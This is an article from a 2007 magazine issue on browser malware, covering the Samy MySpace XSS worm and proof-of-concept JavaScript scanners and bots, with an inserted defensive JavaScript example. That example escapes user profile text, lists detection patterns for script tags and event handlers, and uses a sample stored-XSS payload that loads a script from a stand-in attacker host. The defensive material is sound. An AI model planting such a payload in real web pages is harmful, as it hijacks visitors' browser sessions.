New Types of Computer Crime: Combating malware, botnets, phishing
by Lenny Zeltser
Issue: May 2007

Browser Malware
While botnets have become potent weapons for cyberattackers, online thieves are also turning their focus to the Web browser. The browser is becoming the primary application used to access data at home and at work, making it an attractive target. After all, why bother compromising the underlying operating system if the most sensitive transactions--from online banking to corporate sales management--occur in the browser? The browser includes powerful functionality to support the advanced requirements of modern Web-based applications; these features create an ecosystem for malicious code to survive without directly interacting with the operating system.

October 2005 brought the first high-profile worm that was purely Web-based. The Samy worm took advantage of a cross-site scripting (XSS) flaw in the MySpace Web site and employed a popular JavaScript construct used in many AJAX applications. Such worms embed their code in pages of the compromised Web site and typically spread when the site's users view the infected page. The payload of such worms varies, but could range from defacing the infected pages to executing financial transactions within the context of the victim's session.

The Samy worm infected more than a million MySpace users. On its heels came other worms powered by XSS and AJAX techniques. The list includes MySpace worms that propagated with the help of Flash and QuickTime browser plug-ins, as well as worms that spread on Orkut, Gaia Online and Yahoo! Mail Web sites.
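As an added illustration (not code from the article), here is the basic defense against the stored-XSS mechanism these worms depend on: profile text supplied by one user is HTML-escaped before it is embedded in a page served to another user, so embedded script is rendered as inert text, and a write-time check flags active-content markers so the site can log and alert on them. The function names and the sample payload are constructed for this example.

```javascript
// Added example, not from the article. Names (escapeHtml, renderProfile,
// findActiveContent) are hypothetical; the sample payload is constructed.

// Characters that must never reach the page unencoded when the field
// is meant to hold plain text.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Markers of active content in a text-only field. Used at write time so a
// profile that tries to carry script is logged, not silently accepted.
const ACTIVE_PATTERNS = [
  /<\s*script/i,        // <script> tags
  /\bon[a-z]+\s*=/i,    // inline event handlers such as onload= / onerror=
  /javascript\s*:/i,    // javascript: URLs
  /expression\s*\(/i,   // CSS expression() supported by old IE versions
];

// Returns the source of each pattern that matched (empty array if clean).
function findActiveContent(text) {
  return ACTIVE_PATTERNS.filter((re) => re.test(text)).map((re) => re.source);
}

// Builds the profile fragment shown to other users. Every user-controlled
// value passes through escapeHtml, so a stored payload cannot execute in
// the viewer's session, which is the propagation step an XSS worm needs.
function renderProfile(displayName, about) {
  return `<h2>${escapeHtml(displayName)}</h2><p>${escapeHtml(about)}</p>`;
}

// Constructed sample: an "about me" field carrying an external script tag.
const SAMPLE_ABOUT = 'hi! <script src="http://attacker.example/w.js"></script>';

function demo() {
  const flagged = findActiveContent(SAMPLE_ABOUT); // ['<\\s*script']
  const html = renderProfile('alice', SAMPLE_ABOUT);
  return { flagged, html, scriptSurvived: html.includes('<script') };
}

console.log(demo());
```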

Another example of the power of browser-based malware is the proof-of-concept port-scanning tool written in JavaScript by security vendor SPI Dynamics to demonstrate some of the challenges of securing intranets. Running in the victim's browser, the scanner can perform reconnaissance against the victim's network even if it is behind a firewall. This tool illustrates the extent to which a malicious Web site can explore the internal network of the site's visitor, even when operating purely in the browser.

SPI Dynamics further demonstrated the capabilities of browser malware by exhibiting a JavaScript bot at the ShmooCon conference in March without making its code public. Called Jikto, the proof-of-concept bot can locate vulnerabilities in Web applications while running within a Web browser. An attacker could inject Jikto in the victim's browser by exploiting XSS and other Web site vulnerabilities. The attacker could control Jikto instances remotely, capturing the information they collect and instructing them to launch further Web-based attacks.

Clearly, today's threat environment is multifaceted and rapidly changing. From zero-day exploits to client-side attacks and botnets, organizations are facing a maturing marketplace that encourages attackers to invest in better organization and tools. In turn, defenders need to keep learning from each other, sharing threat information and discussing effective defense strategies. This is the only way to ensure they do not fall behind in a cyberspace arms race that is unlikely to end any time soon.
